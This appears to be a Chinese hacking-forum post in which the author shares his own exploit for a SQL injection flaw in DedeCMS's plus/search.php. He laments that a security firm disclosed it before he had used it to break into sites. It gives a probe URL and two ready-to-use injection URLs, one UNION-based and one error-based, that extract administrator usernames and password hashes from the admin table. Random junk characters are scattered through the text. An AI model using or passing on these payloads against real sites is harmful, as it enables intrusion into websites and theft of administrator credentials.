转载不加作者名的没JJ
% }3 B; z3 _# g5 z* D: J& V" m! v8 Q- d
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。8 B* n' r3 k5 {* R% h" P
8 l* z" Z' O' n0 i- }4 m/ j
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
. F# G! Y' j- ]' ]* j- D. W) Y
我一般是这样测试的:
* D; J% k3 F: C! W1 Y& e
6 l( V3 B v& l; T提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
. r+ m7 ^7 W: D! v; n7 e ?* Y. N. c( M# f6 J! w. A# e& p
转载不加作者名的没JJ
7 y' U( G3 b% q" c, l* P. w, |9 e: }. | Y. B! u# U
作者:鬼哥
, U# `6 y/ r6 n. y* @1 ~- b
' Q# U: J1 m' m0 Y & R0 u$ A! \1 F0 t" j
' ^" i2 f4 Y* J" P/ ]9 \
看结果如果提示
3 E( S# |2 S( w6 |
. h7 B, N( C& m' uSafe Alert: Request Error step 2 !+ c$ q$ [- ]4 x- ]
! n( ~: a* V0 M2 @
那么直接用下面的exp5 v2 n9 o" N* Q
# r* Y/ I* R( v/ N9 H1 B/ v( w
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
+ N6 c2 M V0 G- |; W1 g! t5 i( ?0 y4 ]
8 C6 a% D2 E6 }4 {2 P4 a
看结果如果提示8 ^. _. Z+ e. `7 p! w
# M6 S% L+ ]! D% S0 Q/ F0 RSafe Alert: Request Error step 1 !6 \0 w. n4 P/ h8 u A5 t
0 ^" f: D" m* Z
那么直接用下面的exp" F* F7 m1 ?+ g7 X
$ V7 A* h1 N1 V! O
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a& Q# Y, M9 T# d( L$ M$ H% ?& S
$ Z$ j: X3 B7 q$ _7 }- p8 Y1 I1 O0 S% r( }
如果正常显示证明漏洞不存在了。, ^! R5 w5 J# f5 L" M2 l
( {% M* ?$ p2 A% F( }
转载不加作者名的没JJ |